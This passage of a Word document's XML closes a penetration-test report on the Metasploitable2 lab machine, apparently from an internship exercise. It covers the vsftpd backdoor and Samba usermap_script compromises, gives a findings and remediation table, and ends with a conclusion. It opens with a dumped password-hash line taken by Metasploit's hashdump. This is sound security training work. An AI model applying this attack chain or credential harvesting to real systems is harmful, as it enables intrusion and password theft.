        <w:t>service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[*] Unshadowed Password File: /home/navya/.msf4/loot/20260703121246_default_192.168.56.106...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A3CBAF">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This confirms extraction of password hashes for all seven system accounts (root, sys, klog, msfadmin, postgres, user, service), a classic post-exploitation objective demonstrating an attacker's ability to move toward offline password cracking or credential reuse elsewhere on a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B62D5CE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>6.3 Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BD441">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Both vulnerabilities allow any unauthenticated remote attacker with network access to the target to gain complete, unrestricted root control of the system. The vsftpd backdoor provides instant root command execution via a single crafted FTP login. The Samba usermap_script flaw provides an interactive reverse shell, upgradeable to a full Meterpreter session capable of system enumeration, credential harvesting, and further lateral movement. Together they represent the most severe possible outcome of a network-facing vulnerability: total compromise of confidentiality, integrity, and availability, achievable with freely available tools and no valid credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587AF64">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>7. Phase 5: Findings &amp; Remediation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3117"/>
        <w:gridCol w:w="3116"/>
      </w:tblGrid>
      <w:tr w14:paraId="736C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7" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="2BAAD197">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="085C23C2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="6792293F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D1E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2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="77959EC3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4 backdoor (CVE-2011-2523)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="069B938B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="49F7119F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Immediately remove/upgrade vsftpd to a current, verified version; never install packages from unverified mirrors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="741E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FFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="168358C7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Samba usermap_script command injection (unauthenticated RCE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0C75056D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="61456088">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Upgrade Samba to a patched version; disable the “usermap script” option unless strictly required; restrict SMB access to trusted hosts only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="188B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2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="452EDF48">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Weak/absent password hashing exposed via hashdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="37592BFC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="52C2B42B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enforce strong password policies and modern hashing (SHA-512/bcrypt); rotate all credentials immediately after any suspected compromise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="47E0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FFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="114E4AAC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Multiple outdated, unpatched services (Tomcat, UnrealIRCd, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="63A73F68">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0CBD536B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Patch or decommission legacy services; this VM is intentionally vulnerable and should never be exposed outside an isolated lab network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="695E9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2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2CCBAC49">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No network segmentation between attacker and target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="48E09045">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium (lab context)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0049D371">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>In production, apply strict network segmentation, firewalling, and least-privilege access between hosts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="56C2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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E737EFE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No intrusion detection observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="330D96F0">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="497C47D9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deploy IDS/IPS and file-integrity monitoring to detect anomalous shell connections such as the one on port 6200.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34D91AC7">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8390C9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>7.1 General Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354BCAF9">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Verify checksums/signatures of all downloaded software packages before installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D8F8F">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Maintain an up-to-date patch management process for all exposed services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A310D0">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Disable or remove unnecessary services (telnet, rsh, X11, etc. were all found open in this assessment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA62268">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Restrict FTP and other legacy protocols in favor of encrypted alternatives (SFTP/FTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DAFCA1">
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implement network monitoring to flag unexpected listening ports such as 6200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D42D85">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01296B5E">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This engagement successfully demonstrated the full attack lifecycle against Metasploitable2, from initial reconnaissance through to root-level compromise via two independent critical vulnerabilities: the vsftpd 2.3.4 backdoor (CVE-2011-2523) and the Samba usermap_script remote command injection flaw. The latter was leveraged to establish a reverse shell and upgrade it to a full Meterpreter session, from which system information and password hashes were successfully extracted. The exercise highlights the severe risk posed by supply-chain compromises, insecure default configurations, and legacy service exposure, and reinforces the importance of patch management, package integrity verification, credential hygiene, and network segmentation in defending real-world systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7B45C">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All testing was conducted in an isolated, non-production lab environment as part of an authorized internship training task.</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15A63A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215</Words>
  <Characters>1464</Characters>
  <TotalTime>9</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1655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2026-07-03T09:20:00Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <cp:lastModifiedBy>nbnav</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-03T09:33:25Z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1033-12.1.0.26880</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>DDDECC19659043569CE78462B201CBBE_12</vt:lpwstr>
  </property>
</Properties>
</file>